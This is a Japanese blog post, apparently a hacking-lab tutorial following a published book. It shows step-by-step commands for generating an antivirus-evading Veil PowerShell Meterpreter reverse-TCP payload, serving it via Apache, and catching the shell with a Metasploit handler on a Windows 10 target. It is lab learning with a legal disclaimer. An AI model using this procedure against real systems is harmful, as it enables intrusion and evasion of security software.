0
1

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?

More than 1 year has passed since last update.

Kali Linux2022.1 でハッキングラボをつくってみる 6 Windows10をハッキングする4 Veil Frameworkを利用する

Last updated at Posted at 2022-04-29

はじめに

「ハッキング・ラボのつくりかた」(IPUSIRON著)のP.335-342をもとに記事を作成する。

注意事項
記事で紹介されている行為を他人や団体、インフラなどの許可を得ずに行った場合、犯罪となる可能性が有ります。
あくまでも、記事の内容は情報セキュリティの学習です。読者様の所有・管理の機器、システムでのみ実行してください。
また、読者さまのシステムにトラブルが起きたとしても、私は責任を負いかねます。

Veil Frameworkのインストールと初期設定

アンチウイルスを回避しなければ、Meterpreterセッションを確立することは出来ない。
Veil Framework(veil)は、アンチウイルスを回避するようなペイロードを生成するツールである。

インストール

sudo apt install veil-evasion
sudo veil

aptでのインストールが完了したら、コマンドveilを管理者権限で実行する。初回起動時は、セットアップが立ち上がる。
その際に、"Are you sure you wish to install Veil-Evasion?"と尋ねられたら、回答"Continue with installation?"に「s」(silent)を入力

同書にも「このインストールはかなり時間がかかります。」と有るとおり、まじで時間がかかります。
時間に余裕があるときに行いましょう。

apt search veilの実行結果で、"veil-catapult"というVeilFrameworkを利用する別のツールもあるが、現在(2022年時点)ではサポートされていないっぽい。
https://github.com/Veil-Framework/Veil-Catapult

更新

アンチウイルスからの回避の成功率をあげるために、Veilをアップデードしておく。
Veilのプロンプトで次にコマンを実行。

Veil >
update

updateコマンドは、veilをsudo veilで立ち上げておかないと、正常に終了しなかった。

ペイロードの設定・作成

Veilには、EvasionとOrdnanceという2つのツールが存在する。アンチウイルスを回避したい場合、Evasionを選択する。ちなみに、Ordnanceは、ペイロードやエクスプロイトに利用できるシェルコードを生成するらしい。
https://github.com/Veil-Framework/Veil-Ordnance

設定

Evasion (1)を使う。

Veil >
use 1

使用できるペイロードを一覧表示

Veil >
list

22番目の"22) powershell/meterpreter/rev_tcp.py"を利用する。

Veil >
use 22

オプション内容の、LHOSTをKaliLinuxのIPアドレスに変更する。
optionsコマンドで確認する。

Veil >
set lhost 192.168.1.100
options

LHOSTは小文字でもOK

作成

設定が終わったら、ペイロードを作成する。

Veil >
generate

"Please enter the base name for output files(default is payload): "にはファイル名を指定する。ここでは、evilWin10v2と指定した。batファイルが作成される。

設置

exitコマンドでVeilプロンプトを終了させて、作成したbatファイルを/home/kaliとapache2のディレクトリにコピーする。apacheを再起動させて、batファイルがwindows10でダウンロードできるようにする。

sudo cp /var/lib/veil/output/source/evilWin10v2.bat /home/kali/payloads/
sudo cp /var/lib/veil/output/source/evilWin10v2.bat /var/www/html/share/
sudo systemctl restart apache2

リバースシェルを待ち受ける

msfconsoleを立ち上げ、

use /multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.100
exploit

と実行する。
リバースシェルの待ち受け状態となる。

Windows10でevilWin10v2.batを実行する。Windows Defender SmartScreenの警告画面が出る。構わず実行すると、セッションが確立する。

終わりに

参考にしたもの
「ハッキング・ラボのつくりかた」(IPUSIRON著)

0
1
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
0
1

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?